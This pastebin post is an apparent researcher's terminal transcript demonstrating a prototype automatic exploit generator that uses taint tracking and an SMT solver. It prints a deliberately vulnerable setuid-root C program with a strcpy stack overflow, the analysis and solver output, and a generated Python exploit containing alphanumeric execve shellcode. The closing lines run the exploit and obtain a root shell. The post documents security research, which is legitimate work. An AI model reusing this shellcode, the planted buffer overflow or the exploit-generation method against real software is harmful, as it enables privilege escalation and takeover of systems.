a pastebin project

Someone

  1. (First get the address of a register trampoline. For now we are assuming ASLR is enabled but not DEP and SSP)
  2.  
  3. nnp@ubuntudeux:~/msf3$ ./msfelfscan -j eax ~/pin-2.6-25945-gcc.4.0.0-ia32_intel64-linux/source/tools/xgen/test_programs/read_strcpy_big
  4. [/home/nnp/pin-2.6-25945-gcc.4.0.0-ia32_intel64-linux/source/tools/xgen/test_programs/read_strcpy_big]
  5. 0x0804846f call eax
  6. 0x08048653 call eax
  7.  
  8. (This is the program we will be exploiting. It contains a filter around most of user input. The first few bytes are unfiltered because I was too lazy to fix up the alphanumeric shellcode currently in my prototype)
  9.  
  10. nnp@ubuntudeux:~/pin-2.6-25945-gcc.4.0.0-ia32_intel64-linux/source/tools/xgen$ ls -al test_programs/read_strcpy_big
  11. -rwsr-sr-x 1 root nnp 8495 2009-06-17 20:45 test_programs/read_strcpy_big
  12. nnp@ubuntudeux:~/pin-2.6-25945-gcc.4.0.0-ia32_intel64-linux/source/tools/xgen$ cat test_programs/read_strcpy_big.c
  13. #include <stdlib.h>
  14. #include <stdio.h>
  15. #include <string.h>
  16. #include <fcntl.h>
  17. #include <unistd.h>
  18.  
  19. void smashySmashy(char *userInput)
  20. {
  21.     char shellcodeBuffer[900];
  22.     int i = 0;
  23.  
  24.     // alphanumeric only
  25.     for (i = 7; i < 768; i++)
  26.         if (userInput[i] > 'z' || userInput[i] < '0')
  27.             exit(0);
  28.        
  29.     // The shellcode buffer will be built from two disjoint parts of user input
  30.     printf("Shellcode buffer ranges from %p to %p\n", shellcodeBuffer, shellcodeBuffer+899);
  31.     strcpy(shellcodeBuffer, userInput);
  32. }
  33.  
  34. int main(int argc, char *argv[])
  35. {
  36.     int res, fd = -1;
  37.     char *heapArr = NULL;
  38.     fd = open(argv[1], O_RDONLY);
  39.  
  40.     heapArr = malloc(1024*sizeof(char));
  41.     printf("Reading 1024 bytes into %p\n", heapArr);
  42.     res = read(fd, heapArr, 1024);
  43.    
  44.     if (res != 1024) {
  45.         printf("Read %d bytes, wtf\n", res);
  46.         return -1;
  47.     } else {
  48.          printf("Read %d bytes\n", res);
  49.     }
  50.  
  51.     smashySmashy(heapArr);
  52.  
  53.     return 0;
  54. }
  55.  
  56. (Now on to the main show. The vulnerable program is run with some fuzz input that causes it to crash. Just before the EIP is corrupted we detect the vulnerability and begin exploit generation)
  57.  
  58. nnp@ubuntudeux:~/pin-2.6-25945-gcc.4.0.0-ia32_intel64-linux/source/tools/xgen$ time ~/pin-2.6-25945-gcc.4.0.0-ia32_intel64-linux/ia32/bin/pinbin -t exploitgen.so  -- ./test_programs/read_strcpy_big ./test_programs/1024.input
  59. [+] Client initialising
  60. [+] Starting program
  61. Reading 1024 bytes into 0x804a008
  62. [+] Hooked read
  63. [+] Read 1024 bytes
  64. Read 1024 bytes
  65. Shellcode buffer ranges from 0xbf921e90 to 0xbf922213
  66. [!] Byte 0 of stored EIP is tainted
  67. [!] Byte 1 of stored EIP is tainted
  68. [!] Byte 2 of stored EIP is tainted
  69. [!] Byte 3 of stored EIP is tainted
  70. [!] Crash reason: tainted return value (0x41414141)
  71. [+] Hooked 1 reads, for a total of 1024 bytes read
  72. [+] Getting taint propagation statistics...
  73. [+] Number of tainted memory locations: 2048
  74. [+] Number of taint buffers: 2
  75. [+] Logging taint buffer into to ti.out
  76. [+] Determining trampoline reachable taint buffers...
  77. [+] 1 buffer(s) reachable via a register trampoline
  78.         [#] eax -> 0xbf921e90(size: 1024, cclVal: 1)
  79. [+] Processing for 2 different shellcodes
  80. [+] Shellcode 'execve'
  81.         [#] Building constraint formula...
  82.         [#] Adding EIP overwrite constraints...
  83.         [#] Adding shellcode constraints...
  84.         [#] Logging formula to resultsDir/execve.smt
  85. [+] Shellcode 'alphanumeric_execve'
  86.         [#] Building constraint formula...
  87.         [#] Adding EIP overwrite constraints...
  88.         [#] Adding shellcode constraints...
  89.         [#] Logging formula to resultsDir/alphanumeric_execve.smt
  90. [!] Calling exit() in the analysis client
  91.  
  92. real    0m5.009s
  93. user    0m4.108s
  94. sys     0m0.876s
  95. nnp@ubuntudeux:~/pin-2.6-25945-gcc.4.0.0-ia32_intel64-linux/source/tools/xgen$ ls -al resultsDir/
  96. total 172
  97. drwxr-xr-x 2 nnp nnp  4096 2009-06-17 17:15 .
  98. drwxr-xr-x 7 nnp nnp  4096 2009-06-17 20:41 ..
  99. -rw-r--r-- 1 nnp nnp 89627 2009-06-17 20:41 alphanumeric_execve.smt
  100. -rw-r--r-- 1 nnp nnp 68072 2009-06-17 20:41 execve.smt
  101.  
  102. (First attempt to solve the formula using the regular shellcode. It is unsatisfiable due to the filter)
  103.  
  104. nnp@ubuntudeux:~/pin-2.6-25945-gcc.4.0.0-ia32_intel64-linux/source/tools/xgen$ ~/Desktop/yices-1.0.21/bin/yices -smt -e < resultsDir/execve.smt
  105. unsat
  106.  
  107. (The formula using the alphanumeric shellcode passes)
  108. nnp@ubuntudeux:~/pin-2.6-25945-gcc.4.0.0-ia32_intel64-linux/source/tools/xgen$ ~/Desktop/yices-1.0.21/bin/yices -smt -e < resultsDir/alphanumeric_execve.smt | grep sat
  109. sat
  110. nnp@ubuntudeux:~/pin-2.6-25945-gcc.4.0.0-ia32_intel64-linux/source/tools/xgen$ ~/Desktop/yices-1.0.21/bin/yices -smt -e < resultsDir/alphanumeric_execve.smt > bitvecf
  111.  
  112. (Here is a sample of what the solver produces. Each input variable is assigned a bitvector value that we can parse to whatever input format we want)
  113.  
  114. nnp@ubuntudeux:~/pin-2.6-25945-gcc.4.0.0-ia32_intel64-linux/source/tools/xgen$ tail bitvecf
  115. (= i1015 0b01000001)
  116. (= i1016 0b01000001)
  117. (= i1017 0b01000001)
  118. (= i1018 0b01000001)
  119. (= i1019 0b01000001)
  120. (= i1020 0b01000001)
  121. (= i1021 0b01000001)
  122. (= i1022 0b01000001)
  123. (= i1023 0b01000001)
  124.  
  125. nnp@ubuntudeux:~/pin-2.6-25945-gcc.4.0.0-ia32_intel64-linux/source/tools/xgen$ ./bitVecToHex bitvecf
  126. import sys
  127. exploit = '\xdd\xc7\xd9\x74\x24\xf4\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x46\x51\x49\x4b\x42\x4a\x45\x47\x51\x48\x48\x4d\x4b\x30\x42\x4a\x44\x4b\x50\x58\x4c\x59\x51\x42\x42\x46\x42\x48\x46\x4d\x42\x43\x4d\x59\x4b\x57\x43\x58\x46\x4f\x44\x33\x43\x58\x43\x30\x45\x38\x46\x4f\x42\x42\x43\x59\x42\x4e\x4b\x39\x4b\x53\x50\x52\x4a\x48\x45\x5a\x45\x50\x43\x30\x45\x50\x46\x4f\x42\x42\x42\x49\x42\x4e\x46\x4f\x45\x32\x43\x51\x44\x33\x43\x58\x45\x50\x51\x47\x51\x43\x4c\x49\x4d\x31\x48\x4d\x4b\x30\x45\x5a\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x6f\x84\x04\x08\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41'
  128. ex = open(sys.argv[1], 'w')
  129. ex.write(exploit)
  130. ex.close()
  131.  
  132. (The above code is what is currently produced by my prototype. Basically a simple Python exploit that we can write to a file and use to create our new input)
  133.  
  134. nnp@ubuntudeux:~/pin-2.6-25945-gcc.4.0.0-ia32_intel64-linux/source/tools/xgen$ ./bitVecToHex bitvecf > pysploit.py
  135. nnp@ubuntudeux:~/pin-2.6-25945-gcc.4.0.0-ia32_intel64-linux/source/tools/xgen$ python pysploit.py exploit.in
  136. nnp@ubuntudeux:~/pin-2.6-25945-gcc.4.0.0-ia32_intel64-linux/source/tools/xgen$ cd test_programs/
  137.  
  138. (At this point we have gone from an input consisting of 1024 A characters, to a SMT formula, to a satisfying assignment and back to an input that should be a functional exploit. It's a small program with a silly vulnerability and some protections disabled, but I think it demonstrates the potential. The current goal is to move from this toy environment to a modern Linux configuration and see what we can do. Should be fun!)
  139.  
  140. nnp@ubuntudeux:~/pin-2.6-25945-gcc.4.0.0-ia32_intel64-linux/source/tools/xgen/test_programs$ ./read_strcpy_big ../exploit.in
  141. Reading 1024 bytes into 0x804a008
  142. Read 1024 bytes
  143. Shellcode buffer ranges from 0xbff1a070 to 0xbff1a3f3
  144. To run a command as administrator (user "root"), use "sudo <command>".
  145. See "man sudo_root" for details.
  146.  
  147. <-gcc.4.0.0-ia32_intel64-linux/source/tools/xgen/test_programs# whoami
  148. root

advertising

Create a Paste

Please enter your new post below (or upload a file instead):





Please note that information posted here will not expire by default. If you want it to expire, please set the expiry time above. If it is set to expire, web search engines will not be allowed to index it prior to it expiring. Items that are not marked to expire will be indexable by search engines. Be careful with your passwords.

worth-right